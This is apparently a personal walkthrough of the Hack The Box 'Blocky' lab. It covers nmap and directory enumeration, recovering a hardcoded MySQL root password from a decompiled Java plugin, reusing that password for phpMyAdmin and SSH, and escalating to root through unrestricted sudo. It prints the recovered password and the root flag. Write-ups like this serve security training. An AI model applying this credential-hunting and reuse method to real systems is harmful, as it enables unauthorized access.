This post documents my process for solving the Blocky box on Hack The Box. The machine revolves around web enumeration, WordPress, reverse engineering a Java plugin, MySQL credential hunting, and privilege escalation.
Reference
https://0xdf.gitlab.io/2020/06/30/htb-blocky.html
Recon
Nmap
nmap -sC -sV 10.10.10.37
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
8192/tcp closed sophos
Notes:
- Redirects to http://blocky.htb (add to /etc/hosts)
- Services: FTP, SSH, Apache/WordPress, MySQL
Technologies
- WordPress 4.8
- PHP
- MySQL
Feroxbuster
feroxbuster -u http://blocky.htb
- Found various WordPress and plugin directories
- Directory listings enabled in some locations
There is also a comment section, possibly for XSS testing.
Attacks & Enumeration
- The comment section did not have XSS
- No SQL injection
- No FTP exploit (anonymous login failed, exploit-db checks failed)
- Inspection of jar files in
/plugins- Used
stringson custom plugin; found hardcoded credentials
- Used
Java Plugin Analysis
Reverse engineering the BlockyCore.class file revealed:
package com.myfirstplugin;
public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
public void onServerStart() {}
public void onServerStop() {}
public void onPlayerJoin() {
sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
}
public void sendMessage(String username, String message) {}
}
The sqlUser and sqlPass are hardcoded. I used these credentials to access phpMyAdmin.
Exploitation
- Could not SSH using the same creds
- Used creds to log in to phpMyAdmin
- Verified users and privileges
phpMyAdmin users included:
debian-sys-maintmysql.sysphpmyadminrootwordpress
Privilege Escalation
In the wp_users table, found the user Notch. Tried the same MySQL password for SSH with the notch username:
ssh notch@blocky.htb
Successful login! id command revealed notch is in several privileged groups, including sudo.
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Checking with sudo -l showed notch can run any command as root:
notch@Blocky:~$ sudo -l
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
Used sudo su to get a root shell:
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# ls
minecraft user.txt
root@Blocky:~# cd /root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
3cf136f494e9bb904fcd902d52f803cc
Lessons Learned
- Always enumerate and inspect all plugins/files; reverse engineering can reveal hardcoded secrets.
- Directory listings in WordPress installations can leak important files.
- Credentials are often reused across services—try them everywhere!
- Privilege escalation is sometimes as simple as finding a misconfigured
sudopermission. - Checking users in the application database can uncover valid system usernames.
Writeup based on my own exploitation process, with inspiration from HTB community writeups.